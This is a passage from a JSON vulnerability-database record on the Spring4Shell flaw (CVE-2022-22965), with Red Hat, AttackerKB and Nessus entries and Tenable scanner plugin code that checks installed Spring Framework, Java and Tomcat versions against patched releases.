"AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": 
false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22965"], "modified": "2022-04-27T09:45:24", "id": "RHSA-2022:1626", "href": "https://access.redhat.com/errata/RHSA-2022:1626", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "attackerkb": [{"lastseen": "2022-05-10T18:27:10", "description": "A Spring MVC or Spring WebFlux application running on JDK 9+ may be vulnerable to remote code execution (RCE) via data binding. The specific exploit requires the application to run on Tomcat as a WAR deployment. If the application is deployed as a Spring Boot executable jar, i.e. the default, it is not vulnerable to the exploit. However, the nature of the vulnerability is more general, and there may be other ways to exploit it.\n\n \n**Recent assessments:** \n \n**jbaines-r7** at April 01, 2022 6:13pm UTC reported:\n\nIt\u2019s currently difficult to assess the exact value of this vulnerability because we don\u2019t know how common the vulnerable configuration is. We might not even be aware of all the vulnerable configurations at this time. 
See the Rapid7 analysis for additional details.\n\nAssessed Attacker Value: 4 \nAssessed Attacker Value: 4Assessed Attacker Value: 2\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-02T00:00:00", "type": "attackerkb", "title": "CVE-2022-22965", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22965"], "modified": "2022-04-02T00:00:00", "id": "AKB:F4BF02AE-B090-4307-89AA-47E57C92EC8F", "href": "https://attackerkb.com/topics/xtgLfwQYBm/cve-2022-22965", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "nessus": [{"lastseen": "2022-04-11T21:53:08", "description": "The version of Apache Tomcat installed on the remote host is 8.x prior to 8.5.78.\n\nThis version of Apache Tomcat does not have mitigations in place to protect against Spring4Shell (CVE-2022-22965). 
While this does not represent a vulnerability in Apache Tomcat itself, it is recommend to update Apache Tomcat to a version with the Spring4Shell mitigations present.\n\nNote that Nessus has not tested for the mitigations but has instead relied only on the application's self-reported version number.", "cvss3": {}, "published": "2022-04-01T00:00:00", "type": "nessus", "title": "Apache Tomcat 8.x < 8.5.78 Spring4Shell (CVE-2022-22965) Mitigations", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2022-22965"], "modified": "2022-04-11T00:00:00", "cpe": ["cpe:/a:apache:tomcat"], "id": "TOMCAT_8_5_78.NASL", "href": "https://www.tenable.com/plugins/nessus/159462", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable Network Security, Inc.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(159462);\n script_version(\"1.2\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/11\");\n\n script_name(english:\"Apache Tomcat 8.x < 8.5.78 Spring4Shell (CVE-2022-22965) Mitigations\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Apache Tomcat server does not have the Spring4Shell (CVE-2022-22965) mitigations\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Apache Tomcat installed on the remote host is 8.x prior to 8.5.78.\n\nThis version of Apache Tomcat does not have mitigations in place to protect against Spring4Shell (CVE-2022-22965). 
While\nthis does not represent a vulnerability in Apache Tomcat itself, it is recommend to update Apache Tomcat to a version\nwith the Spring4Shell mitigations present.\n\nNote that Nessus has not tested for the mitigations but has instead relied only on the application's self-reported\nversion number.\");\n # https://spring.io/blog/2022/04/01/spring-framework-rce-mitigation-alternative\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?2401ae46\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Apache Tomcat version 8.5.78 or later.\");\n script_set_attribute(attribute:\"agent\", value:\"all\");\n script_set_attribute(attribute:\"risk_factor\", value:\"None\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2022/03/31\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2022/04/01\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2022/04/01\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"combined\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:apache:tomcat\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Web Servers\");\n\n script_copyright(english:\"This script is Copyright (C) 2022 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"tomcat_error_version.nasl\", \"tomcat_win_installed.nbin\", \"apache_tomcat_nix_installed.nbin\");\n script_require_keys(\"installed_sw/Apache Tomcat\");\n\n exit(0);\n}\n\ninclude('tomcat_version.inc');\n\ntomcat_check_version(fixed:'8.5.78', min:'8.0.0', severity:SECURITY_NOTE, granularity_regex: \"^8(\\.[012345])?$\");\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2022-04-22T19:43:26", "description": "Spring MVC and Spring WebFlux applications, when packaged as a traditional WAR file, running on JDK version 9 and higher in an Apache Tomcat servlet container and exposing one or more endpoints with DataBinder enabled, suffer from a Remote Code Execution (RCE) vulnerability.\n\nBy crafting a specific HTTP request, an attacker could leverage the vulnerability to compromise the target by, for example, hosting a web shell on the target application.", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2022-03-31T00:00:00", "type": "nessus", "title": "Spring Framework < 5.2.20 / 5.3.x < 5.3.18 Remote Code Execution (Spring4Shell)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2022-22965"], "modified": "2022-04-07T00:00:00", "cpe": ["cpe:2.3:a:vmware:spring_security:*:*:*:*:*:*:*:*"], "id": "WEB_APPLICATION_SCANNING_113217", "href": "https://www.tenable.com/plugins/was/113217", "sourceData": "No source data", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-05-15T15:41:27", "description": "The remote host contains a Spring Framework library version that is prior to 5.2.20 or 5.3.x prior to 5.3.18. It is, therefore, affected by a remote code execution vulnerability:\n - A Spring MVC or Spring WebFlux application running on JDK 9+ may be vulnerable to remote code execution (RCE) via data binding. The specific exploit requires the application to run on Tomcat as a WAR deployment. 
If the application is deployed as a Spring Boot executable jar, i.e. the default, it is not vulnerable to the exploit. However, the nature of the vulnerability is more general, and there may be other ways to exploit it.\n - These are the prerequisites for the exploit:\n - JDK 9 or higher\n - Apache Tomcat as the Servlet container\n - Packaged as WAR\n - spring-webmvc or spring-webflux dependency", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2022-04-06T00:00:00", "type": "nessus", "title": "Spring Framework Spring4Shell (CVE-2022-22965)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2022-22965"], "modified": "2022-05-13T00:00:00", "cpe": ["cpe:/a:pivotal_software:spring_framework", "cpe:/a:vmware:spring_framework"], "id": "SPRING4SHELL.NBIN", "href": "https://www.tenable.com/plugins/nessus/159542", "sourceData": "Binary data spring4shell.nbin", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-04-11T21:52:08", "description": "The version of Apache Tomcat installed on the remote host is 9.x prior to 9.0.62.\n\nThis version of Apache Tomcat does not have mitigations in place to protect against Spring4Shell (CVE-2022-22965). 
While this does not represent a vulnerability in Apache Tomcat itself, it is recommend to update Apache Tomcat to a version with the Spring4Shell mitigations present.\n\nNote that Nessus has not tested for the mitigations but has instead relied only on the application's self-reported version number.", "cvss3": {}, "published": "2022-04-01T00:00:00", "type": "nessus", "title": "Apache Tomcat 9.x < 9.0.62 Spring4Shell (CVE-2022-22965) Mitigations", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2022-22965"], "modified": "2022-04-11T00:00:00", "cpe": ["cpe:/a:apache:tomcat"], "id": "TOMCAT_9_0_62.NASL", "href": "https://www.tenable.com/plugins/nessus/159464", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable Network Security, Inc.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(159464);\n script_version(\"1.2\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/11\");\n\n script_name(english:\"Apache Tomcat 9.x < 9.0.62 Spring4Shell (CVE-2022-22965) Mitigations\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Apache Tomcat server does not have the Spring4Shell (CVE-2022-22965) mitigations\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Apache Tomcat installed on the remote host is 9.x prior to 9.0.62.\n\nThis version of Apache Tomcat does not have mitigations in place to protect against Spring4Shell (CVE-2022-22965). 
While\nthis does not represent a vulnerability in Apache Tomcat itself, it is recommend to update Apache Tomcat to a version\nwith the Spring4Shell mitigations present.\n\nNote that Nessus has not tested for the mitigations but has instead relied only on the application's self-reported\nversion number.\");\n # https://spring.io/blog/2022/04/01/spring-framework-rce-mitigation-alternative\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?2401ae46\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Apache Tomcat version 9.0.62 or later.\");\n script_set_attribute(attribute:\"agent\", value:\"all\");\n script_set_attribute(attribute:\"risk_factor\", value:\"None\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2022/03/31\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2022/04/01\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2022/04/01\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"combined\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:apache:tomcat\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Web Servers\");\n\n script_copyright(english:\"This script is Copyright (C) 2022 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"tomcat_error_version.nasl\", \"tomcat_win_installed.nbin\", \"apache_tomcat_nix_installed.nbin\");\n script_require_keys(\"installed_sw/Apache Tomcat\");\n\n exit(0);\n}\n\ninclude('tomcat_version.inc');\n\ntomcat_check_version(fixed:'9.0.62', min:'9.0.0', severity:SECURITY_NOTE, granularity_regex: \"^9(\\.0)?$\");\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2022-04-11T21:52:34", "description": "The version of Apache Tomcat installed on the remote host is 10.x prior to 10.0.20.\n\nThis version of Apache Tomcat does not have mitigations in place to protect against Spring4Shell (CVE-2022-22965). While this does not represent a vulnerability in Apache Tomcat itself, it is recommend to update Apache Tomcat to a version with the Spring4Shell mitigations present.\n\nNote that Nessus has not tested for the mitigations but has instead relied only on the application's self-reported version number.", "cvss3": {}, "published": "2022-04-01T00:00:00", "type": "nessus", "title": "Apache Tomcat 10.x < 10.0.20 Spring4Shell (CVE-2022-22965) Mitigations", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2022-22965"], "modified": "2022-04-11T00:00:00", "cpe": ["cpe:/a:apache:tomcat"], "id": "TOMCAT_10_0_20.NASL", "href": "https://www.tenable.com/plugins/nessus/159463", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable Network Security, Inc.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(159463);\n script_version(\"1.2\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/11\");\n\n script_name(english:\"Apache Tomcat 10.x < 10.0.20 Spring4Shell (CVE-2022-22965) Mitigations\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Apache Tomcat server does not have the Spring4Shell (CVE-2022-22965) mitigations\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Apache 
Tomcat installed on the remote host is 10.x prior to 10.0.20.\n\nThis version of Apache Tomcat does not have mitigations in place to protect against Spring4Shell (CVE-2022-22965). While\nthis does not represent a vulnerability in Apache Tomcat itself, it is recommend to update Apache Tomcat to a version\nwith the Spring4Shell mitigations present.\n\nNote that Nessus has not tested for the mitigations but has instead relied only on the application's self-reported\nversion number.\");\n # https://spring.io/blog/2022/04/01/spring-framework-rce-mitigation-alternative\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?2401ae46\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Apache Tomcat version 10.0.20 or later.\");\n script_set_attribute(attribute:\"agent\", value:\"all\");\n script_set_attribute(attribute:\"risk_factor\", value:\"None\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2022/03/31\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2022/04/01\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2022/04/01\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"combined\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:apache:tomcat\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Web Servers\");\n\n script_copyright(english:\"This script is Copyright (C) 2022 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"tomcat_error_version.nasl\", \"tomcat_win_installed.nbin\", \"apache_tomcat_nix_installed.nbin\");\n script_require_keys(\"installed_sw/Apache Tomcat\");\n\n exit(0);\n}\n\ninclude('tomcat_version.inc');\n\ntomcat_check_version(fixed:'10.0.20', min:'10.0.0', severity:SECURITY_NOTE, granularity_regex: \"^10(\\.0)?$\");\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2022-05-16T01:46:30", "description": "The remote host contains a Spring Framework library version that is prior to 5.2.20 or 5.3.x prior to 5.3.18. It is, therefore, affected by a remote code execution vulnerability:\n\n - A Spring MVC or Spring WebFlux application running on JDK 9+ may be vulnerable to remote code execution (RCE) via data binding. The specific exploit requires the application to run on Tomcat as a WAR deployment. If the application is deployed as a Spring Boot executable jar, i.e. the default, it is not vulnerable to the exploit. However, the nature of the vulnerability is more general, and there may be other ways to exploit it.\n\n - These are the prerequisites for the exploit:\n - JDK 9 or higher\n - Apache Tomcat as the Servlet container\n - Packaged as WAR\n - spring-webmvc or spring-webflux dependency\n\nNote that users are required to enable the 'Show potential false alarms' setting, also known as paranoid mode, in their scan policy in order to enable this plugin in a scan. 
In addition, the 'Perform thorough tests' setting must be enabled as well.\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2022-03-31T00:00:00", "type": "nessus", "title": "Spring Framework < 5.2.20 / 5.3.x < 5.3.18 Remote Code Execution (CVE-2022-22965)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2022-22965"], "modified": "2022-05-11T00:00:00", "cpe": ["cpe:/a:pivotal_software:spring_framework", "cpe:/a:vmware:spring_framework"], "id": "SPRING_CVE-2022-22965_LOCAL.NASL", "href": "https://www.tenable.com/plugins/nessus/159374", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(159374);\n script_version(\"1.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/05/11\");\n\n script_cve_id(\"CVE-2022-22965\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/04/25\");\n\n script_name(english:\"Spring Framework < 5.2.20 / 5.3.x < 5.3.18 Remote Code Execution (CVE-2022-22965)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote host contains a web application framework library that is affected by a remote code execution vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote host contains a Spring Framework library version that is prior to 5.2.20 or 5.3.x prior to 5.3.18. It is,\ntherefore, affected by a remote code execution vulnerability:\n\n - A Spring MVC or Spring WebFlux application running on JDK 9+ may be vulnerable to remote code execution (RCE) via\n data binding. The specific exploit requires the application to run on Tomcat as a WAR deployment. If the application\n is deployed as a Spring Boot executable jar, i.e. 
the default, it is not vulnerable to the exploit. However, the\n nature of the vulnerability is more general, and there may be other ways to exploit it.\n\n - These are the prerequisites for the exploit:\n - JDK 9 or higher\n - Apache Tomcat as the Servlet container\n - Packaged as WAR\n - spring-webmvc or spring-webflux dependency\n\nNote that users are required to enable the 'Show potential false alarms' setting, also known as paranoid mode, in their\nscan policy in order to enable this plugin in a scan. In addition, the 'Perform thorough tests' setting must be enabled\nas well.\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://tanzu.vmware.com/security/cve-2022-22965\");\n # https://spring.io/blog/2022/03/31/spring-framework-rce-early-announcement\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?718f9ac3\");\n # https://spring.io/blog/2022/04/01/spring-framework-rce-mitigation-alternative\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?2401ae46\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Spring Framework version 5.2.20 or 5.3.18 or later.\");\n script_set_attribute(attribute:\"agent\", value:\"all\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2022-22965\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n 
script_set_attribute(attribute:\"metasploit_name\", value:'Spring Framework Class property RCE (Spring4Shell)');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2022/03/31\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2022/03/31\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2022/03/31\");\n\n script_set_attribute(attribute:\"potential_vulnerability\", value:\"true\");\n script_set_attribute(attribute:\"requires_paranoid_scanning\", value:\"true\");\n script_set_attribute(attribute:\"plugin_type\", value:\"combined\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:pivotal_software:spring_framework\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:vmware:spring_framework\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Misc.\");\n\n script_copyright(english:\"This script is Copyright (C) 2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"spring_jar_detection.nbin\", \"tomcat_error_version.nasl\", \"tomcat_win_installed.nbin\", \"apache_tomcat_nix_installed.nbin\", \"java_jre_installed_unix.nbin\", \"java_jre_installed_win.nbin\");\n script_require_keys(\"installed_sw/Spring Framework\", \"installed_sw/Apache Tomcat\", \"installed_sw/Java\", \"Settings/ParanoidReport\");\n\n exit(0);\n}\n\ninclude('vcf.inc');\ninclude('tomcat_version.inc');\n\nvar app_info = vcf::combined_get_app_info(app:'Spring Framework');\n\n# A vuln version of Java must be installed for the exploit to work\nvar java_exit_message = 'A vulnerable version of Java is not installed. 
Spring Framework is, therefore, not vulnerable.';\nvar java_install_count = get_install_count(app_name:'Java', exit_if_zero:FALSE);\nif (java_install_count < 1)\n exit(0, java_exit_message);\nvar java_installs = get_combined_installs(app_name:'Java');\nif (java_installs[0] != IF_OK)\n exit(0, java_exit_message);\n\n# JDK 9+ is vulnerable\n# Exit if all detected Java installs are < 9\nvar vuln_java = FALSE;\nforeach var java_install (java_installs[1])\n{\n var java_version = str_replace(string:java_install.version, find:'_', replace:'.');\n if ( ver_compare(ver:java_version, fix:'1.9.0', strict:FALSE) >= 0 )\n {\n vuln_java = TRUE;\n break;\n }\n}\n\nif (!vuln_java)\n exit(0, java_exit_message);\n\n# A \"vulnerable\" version of Tomcat must be installed for the exploit to work\nvar tomcat_exit_message = 'A vulnerable version of Apache Tomcat is not installed. Spring Framework is, therefore, not vulnerable.';\nvar tomcat_install_count = get_install_count(app_name:'Apache Tomcat', exit_if_zero:FALSE);\nif (tomcat_install_count < 1)\n exit(0, tomcat_exit_message);\nvar tomcat_installs = get_combined_installs(app_name:'Apache Tomcat');\nif (tomcat_installs[0] != IF_OK)\n exit(0, tomcat_exit_message);\n\n# Tomcat 10.0.20, 9.0.62, and 8.5.78 are patched\n# Exit if all detected Tomcat installs are patched\nvar vuln_tomcat = FALSE;\nforeach var install (tomcat_installs[1])\n{\n if (\n tomcat_ver_cmp(ver:install.version, fix:'10.0.20', same_branch:TRUE) < 0 ||\n tomcat_ver_cmp(ver:install.version, fix:'9.0.62', same_branch:TRUE) < 0 ||\n tomcat_ver_cmp(ver:install.version, fix:'8.5.78', same_branch:TRUE) < 0\n )\n {\n vuln_tomcat = TRUE;\n break;\n }\n}\n\nif (!vuln_tomcat)\n exit(0, tomcat_exit_message);\n\n# Non-default configuration\nif (report_paranoia < 2) \n audit(AUDIT_PARANOID);\n\nvar constraints = [\n { 'fixed_version':'5.2.20' },\n { 'min_version':'5.3', 'fixed_version':'5.3.18' }\n];\n\nvcf::check_version_and_report(app_info:app_info, constraints:constraints, 
severity:SECURITY_HOLE);\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-05-15T15:43:32", "description": "The version of MySQL Enterprise Monitor installed on the remote host are affected by multiple vulnerabilities as referenced in the April 2022 CPU advisory.\n\n - Vulnerability in the MySQL Enterprise Monitor product of Oracle MySQL (component: Monitoring: General (Apache Log4j)). Supported versions that are affected are 8.0.29 and prior. Easily exploitable vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise MySQL Enterprise Monitor. Successful attacks of this vulnerability can result in takeover of MySQL Enterprise Monitor. (CVE-2022-23305)\n\n - Vulnerability in the MySQL Enterprise Monitor product of Oracle MySQL (component: Monitoring: General (Spring Framework)). Supported versions that are affected are 8.0.29 and prior. Easily exploitable vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise MySQL Enterprise Monitor. Successful attacks of this vulnerability can result in takeover of MySQL Enterprise Monitor. (CVE-2022-22965)\n\n - Vulnerability in the MySQL Enterprise Monitor product of Oracle MySQL (component: Monitoring: General (Apache Tomcat)). Supported versions that are affected are 8.0.29 and prior. Easily exploitable vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise MySQL Enterprise Monitor. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Enterprise Monitor. 
(CVE-2021-42340)\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version number.", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2022-04-20T00:00:00", "type": "nessus", "title": "Oracle MySQL Enterprise Monitor (Apr 2022 CPU)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-41184", "CVE-2021-42340", "CVE-2021-44832", "CVE-2022-0778", "CVE-2022-22965", "CVE-2022-23181", "CVE-2022-23305"], "modified": "2022-05-11T00:00:00", "cpe": ["cpe:/a:oracle:mysql_enterprise_monitor"], "id": "MYSQL_ENTERPRISE_MONITOR_8_0_30.NASL", "href": "https://www.tenable.com/plugins/nessus/159917", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable, Inc.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(159917);\n script_version(\"1.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/05/11\");\n\n script_cve_id(\n \"CVE-2021-41184\",\n \"CVE-2021-42340\",\n \"CVE-2021-44832\",\n \"CVE-2022-0778\",\n \"CVE-2022-22965\",\n \"CVE-2022-23181\",\n \"CVE-2022-23305\"\n );\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/04/25\");\n script_xref(name:\"IAVA\", value:\"2022-A-0168\");\n\n script_name(english:\"Oracle MySQL Enterprise Monitor (Apr 2022 CPU)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote host is affected by multiple vulnerabilities\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of MySQL Enterprise Monitor installed on the remote host are affected by multiple vulnerabilities as\nreferenced in the April 2022 CPU advisory.\n\n - Vulnerability in the MySQL Enterprise Monitor product of Oracle MySQL (component: Monitoring: General\n (Apache Log4j)). Supported versions that are affected are 8.0.29 and prior. 
Easily exploitable\n vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise\n MySQL Enterprise Monitor. Successful attacks of this vulnerability can result in takeover of MySQL\n Enterprise Monitor. (CVE-2022-23305)\n\n - Vulnerability in the MySQL Enterprise Monitor product of Oracle MySQL (component: Monitoring: General\n (Spring Framework)). Supported versions that are affected are 8.0.29 and prior. Easily exploitable\n vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise\n MySQL Enterprise Monitor. Successful attacks of this vulnerability can result in takeover of MySQL\n Enterprise Monitor. (CVE-2022-22965)\n\n - Vulnerability in the MySQL Enterprise Monitor product of Oracle MySQL (component: Monitoring: General\n (Apache Tomcat)). Supported versions that are affected are 8.0.29 and prior. Easily exploitable\n vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise\n MySQL Enterprise Monitor. Successful attacks of this vulnerability can result in unauthorized ability to\n cause a hang or frequently repeatable crash (complete DOS) of MySQL Enterprise Monitor. 
(CVE-2021-42340)\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.oracle.com/docs/tech/security-alerts/cpuapr2022cvrf.xml\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.oracle.com/security-alerts/cpuapr2022.html\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply the appropriate patch according to the April 2022 Oracle Critical Patch Update advisory.\");\n script_set_attribute(attribute:\"agent\", value:\"all\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2022-22965\");\n script_set_attribute(attribute:\"cvss3_score_source\", value:\"CVE-2022-23305\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Spring Framework Class property RCE (Spring4Shell)');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2022/04/19\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2022/04/19\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2022/04/20\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"combined\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:oracle:mysql_enterprise_monitor\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n 
